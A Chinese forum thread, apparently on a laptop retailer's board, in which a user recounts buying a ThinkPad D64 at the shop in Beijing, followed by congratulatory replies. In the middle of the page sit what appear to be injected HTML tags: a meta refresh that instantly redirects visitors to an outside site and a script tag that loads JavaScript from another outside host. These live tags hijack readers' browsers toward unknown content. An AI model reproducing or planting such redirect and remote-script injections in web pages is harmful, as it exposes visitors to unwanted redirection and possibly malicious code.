开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] D64购机日记

三年前买的LENOVO 现在成了老古董了, ::67:: 春节之前就想换台本本,先考虑的DELL,后经过考察论证,最终还是IBM,行货的IBM也考察了好久,但价格高的吓人,(刚工作,囊中羞涩)偶然的一次机会,碰到了XY ,就有了加入黑社会的想法........
    在坛子里面潜水了一个多月,试探性的打听他们在XY买的本本的性能,都说可以的,绝对没问题,这一点从XY论坛的人气就可见一斑了......
废话少说,下面来说去XY买小黑的经历,我是经过7个小时的长途跋涉,在早上九点半到北京站的,先去同学那里“蹭”了顿饭,本来打算一起去XY的,但同学临时有事情,就我一个,先去天安门故宫博物院,转了转了。打算第二天去XY,逛完天安门故宫,时间还早,就去XY了,目的是先找到地方,免得第二天浪费时间,现说一下,XY很好找的,找到天辰大厦,在大厅看到XY在十二楼,然后直奔而去,进门的时候已经是下午5点了,还有三位客户在装系统,生意好啊!!!::75::
“要买机器吗?”
“是的"
"什么型号的?确定买吗"
"D64,有现货吗?确定买,"
"有现货,请稍等"
呵呵,坐在沙发上,自己倒了杯水,一点没有陌生感,感觉很温馨的.::85::
过了几分中,货就拿来了.一次拿了两台,还有一位也是和偶一起买机器,
开箱,验机,说起验机,其实很简单的,就那几点,我是让个子高高的戴眼镜的大哥帮忙验的,没问题,一切OK,我选的套餐是512内存换1G,其它什么也没要,这位大哥业务身熟练,转眼间,换好,在装系统时,考虑了好长时间,是用原装正版的英文系统还是重新装中文,最后决定还是先用中文,平时用的都是英文版的,可考虑到对小黑不熟悉,所以就先装中文版的,先用,熟悉了,在一键还原成纯正的英文版的了,装系统也很快的,是用XY的GHOST,恢复的系统,在装系统的时间和这位大歌聊了聊彩票,这位大哥也是铁杆的彩民,........系统装好,又整体的检查了一遍,没问题,交钱提货走人,可交不了钱,哈哈,去XY的时候已经是5点了,银行已经关门了,在ATM上又取不出来那么多,最后协商,交200块押金,第二天提货,呵呵,好事多磨啊,只能如此拉,哈哈,临走时,问了一下,说是10点上班,第二天九点半不到就已经到门口了,到XY 的时候已经有三个客户也在等着验机了.废话少说,交钱走人,走在大街上,拎着小黑,那个高兴劲.............::80::
照片前几天已经发过,::68::

+300---tszmsid
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

评分

tszmsid + 300

写的不错啊,呵呵
不错,顶了
翔意态度似乎都还可以。
恭喜
恭喜呀
那个美啊
恭喜。
恭喜
恭喜lz
听着感觉
貌似速度很快的说
恭喜啊``
羡慕中````

羡慕!

不管怎样我五一也准备出手了.
先恭喜一下
最近这样的手记少了
恭喜
我一直在犹豫买还是不买。。。现在吃住在公司,用公司的电脑,去女朋友家有电脑,我的台式机在老爸老妈那边,再加上公司总加班,矛盾啊,买来怕没时间用心爱的小黑啊。。放着又浪费。。。
羡慕啊

D64不愧是最热门的机型
好象买D64的人貌似很多```呵呵``

恭喜恭喜

XY的速度很快啊 呵呵